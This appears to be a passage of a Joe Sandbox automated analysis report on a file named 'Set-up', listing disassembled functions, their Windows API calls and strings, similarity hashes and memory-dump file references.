Instruction Fuzzy Hash: B6B1A17460470ADFDB10CF24D885BA6B7A4FF85314F048529F859D72D2DB71E849C7A2

Function 008076A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?), ref: 008076DE
send.WS2_32(multi.c,?,?,?), ref: 008076EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00807721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00807745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080774D

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00807712, 00807731
SEND %s:%d send(%lu) = %ld, xrefs: 008076F8
send, xrefs: 0080770B, 0080772A
multi.c, xrefs: 008076DD, 008076E9

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 3540913164-3388739168
Opcode ID: dfe9bfa00e28b8ad56ede517e10c7c48b5006fac8fa2a37f12b1e5b31d93997b
Instruction ID: 9f955106f19dc26587c5f881966ac6793bb1f84267497753fbeab361bcc29ac0
Opcode Fuzzy Hash: dfe9bfa00e28b8ad56ede517e10c7c48b5006fac8fa2a37f12b1e5b31d93997b
Instruction Fuzzy Hash: 0711B6B4A0C2486FD6105B5AAC49E277BADEB85B68F040558FC05E3291D671AC05CAB2

Function 009847B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009DE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE5E2
Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE5FA
Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 009DE637
Part of subcall function 009DE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0096A31E), ref: 009DE64D
Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0096A31E,00000001,?,00000008,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000), ref: 009DE665
Part of subcall function 009DE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE678
Part of subcall function 009DE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE685
Part of subcall function 009DE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE690
Part of subcall function 009DE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E), ref: 009DE6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00D48C14), ref: 009847CC
GetLastError.KERNEL32(?,?,?,?,?,?,00D48C14), ref: 0098483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00D48C14), ref: 00984855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00D48C14), ref: 00984860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00D48C14), ref: 0098488E

Strings

BIO_new_file, xrefs: 00984829, 00984870, 0098489D
crypto/bio/bss_file.c, xrefs: 00984830, 00984877, 009848A4
calling fopen(%s, %s), xrefs: 00984845

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: cb782fbad745119c4da0bd67dcc66952905fccd414ea132f46c7c62406083c1d
Instruction ID: e22344d8fbac0667b259fffc1fc12bad6e4a4b01712cc43f009cd2345af08f3f
Opcode Fuzzy Hash: cb782fbad745119c4da0bd67dcc66952905fccd414ea132f46c7c62406083c1d
Instruction Fuzzy Hash: 432107A5F843417FE12036E53C07F6B795DDFE2B68F080121FA09692C3F695991942B3

Function 008031D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008031EF
Process32First.KERNEL32 ref: 00803245
Process32Next.KERNEL32 ref: 008032CC
CloseHandle.KERNELBASE ref: 008032E7

Strings

CreateToolhelp32Snapshot failed., xrefs: 0080320E
processes, xrefs: 008032F3
name, xrefs: 00803272
pid, xrefs: 00803297

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: 07e62c9950d7cf714001f1adc33f551358460d513ada2918a678ec6798774f10
Instruction ID: 01c291e2ba71ecd51a333522aaf5311ceac3c502de0eebf5ff567bffa1073f0e
Opcode Fuzzy Hash: 07e62c9950d7cf714001f1adc33f551358460d513ada2918a678ec6798774f10
Instruction Fuzzy Hash: D13193B49093049FCB50EFB8D98969EBBF4FF44344F008969E899A7241E7349A44DF52

Function 00807770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,008394BF,?), ref: 008077AE
recv.WS2_32(?,?,008394BF,?), ref: 008077BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 008077F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00807815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080781D

Strings

recv, xrefs: 008077DB, 008077FA
RECV %s:%d recv(%lu) = %ld, xrefs: 008077C8
LIMIT %s:%d %s reached memlimit, xrefs: 008077E2, 00807801

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: 925881820e8ea7c7145ab49db18b67588c69373381860c66f19a4b456f86c497
Instruction ID: 93fbcefc6f98f7fd58310fbc1cd32917dda3056cd6927672b9f027d63cfed3db
Opcode Fuzzy Hash: 925881820e8ea7c7145ab49db18b67588c69373381860c66f19a4b456f86c497
Instruction Fuzzy Hash: 8211C8B4D0C3987FE6109B56AC4DE277BADFB85B68F040568FC04E3291D671AC05CAB2

Function 008075E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00807618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00807659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0080767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00807685

Strings

socket, xrefs: 00807643, 00807662
LIMIT %s:%d %s reached memlimit, xrefs: 0080764A, 00807669
FD %s:%d socket() = %d, xrefs: 0080762E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: 9f3ccb2ae1641033ff95e59bc0a9799a635975cb7744484854eb4c3718d58e3b
Instruction ID: 5b5cb25bbff3c046e65117201989a80abed89f4318ada0eb2a796ba8bc06973d
Opcode Fuzzy Hash: 9f3ccb2ae1641033ff95e59bc0a9799a635975cb7744484854eb4c3718d58e3b
Instruction Fuzzy Hash: 0E11EC75E082516BD6105B6FAC4AE873FA9EF81B34F440564F814E22E1D322D855C7E1

Function 00B8D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B8D1E8

Strings

@, xrefs: 00B8D4B7
NaN, xrefs: 00B8DBAB
Inf, xrefs: 00B8DCA5, 00B8DCBD

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 0cc4cfc2cd14c453c8a7e326f0ab0d41fe5411cfe75177c936d441dd197625ae
Instruction ID: b4a5ebd30e8bc48f8af0513810bf0c01023f853f5b941061997c846f11e9dbd0
Opcode Fuzzy Hash: 0cc4cfc2cd14c453c8a7e326f0ab0d41fe5411cfe75177c936d441dd197625ae
Instruction Fuzzy Hash: D9F1BF7060C7958BD721AF24C0807ABBBE1FB85314F158AAEE9DD873E1D7359905CB82

Function 00839290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008076A0: send.WS2_32(multi.c,?,?,?), ref: 008076DE

WSAGetLastError.WS2_32 ref: 008393C3

Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0083935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00839388

Strings

cf-socket.c, xrefs: 008392CF
send(len=%zu) -> %d, err=%d, xrefs: 00839447
Send failure: %s, xrefs: 008393FB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: 38147a85947304082c02146f0fe166a20997b436dcbc596100d0dfb5dda90479
Instruction ID: 40845b98d1ec8a35b3bad64a753f0456bd5a148e01f4e3ee7237f0da7bc8b1ca
Opcode Fuzzy Hash: 38147a85947304082c02146f0fe166a20997b436dcbc596100d0dfb5dda90479
Instruction Fuzzy Hash: 8A51AF74A00305AFD710DF28C881FAAB7A5FF84314F148529FD98DB292E771E991CB91

Function 008C77B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00D12D2D,00000000,00000000,?,?,?,008C9882,?,00000000), ref: 008C77DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 008C77F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 008C7802
GetLastError.KERNEL32(?,00000000), ref: 008C780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 008C7830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 008C7843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C786B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: 2f5392a0e399a5b695534b22747c2823886f6f579de24490891aeed1d2e7087d
Instruction ID: 9a8d21b0d2d7a63c8f57e1a8393bb4d0e42539ea0cce44901e89819ddd5d86b2
Opcode Fuzzy Hash: 2f5392a0e399a5b695534b22747c2823886f6f579de24490891aeed1d2e7087d
Instruction Fuzzy Hash: 0111DAE1E0530427EB2135216C4AF7B3598EB503A5F14043CFE06D6282F935D804CAB6

Function 0083A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 0083A1C6
WSAGetLastError.WS2_32 ref: 0083A1D0

Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D0A1
Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0A9
Part of subcall function 0081D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0CD
Part of subcall function 0081D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0D7
Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0081D381
Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0081D3A2
Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D3BF
Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D3C9
Part of subcall function 0081D090: SetLastError.KERNEL32(00000000), ref: 0081D3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A220

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 0083A23B
getsockname() failed with errno %d: %s, xrefs: 0083A1F0

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: 32dd88c1209b690b9ef470a03ee3443455e972213c30c5c8fe6ead3e93f4abd0
Instruction ID: 6ddee2add9af4640cb60605de973619a9dec671822eed2429d7a8b15049c9510
Opcode Fuzzy Hash: 32dd88c1209b690b9ef470a03ee3443455e972213c30c5c8fe6ead3e93f4abd0
Instruction Fuzzy Hash: BD21E671808684AAF7259B19DC46FE773BCFF85328F040254F98893151FA32598A86E3

Function 00807310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00803BA6,?,00E3D044,00801BD2), ref: 008073A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00803BA6,?,00E3D044,00801BD2), ref: 008073CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00803BA6,?,00E3D044,00801BD2), ref: 008073D2

Strings

MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00807376
LIMIT %s:%d %s reached memlimit, xrefs: 00807397, 008073B6
calloc, xrefs: 00807390, 008073AF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: f80031bc5e7cc18e810eb0c8c9340430d35c3dba3cfe04bd8c3b577aa69ad410
Instruction ID: 429b7845eb4851b8840320d31b8e79e061f1c380fdcf4e6b808bead48feaeeee
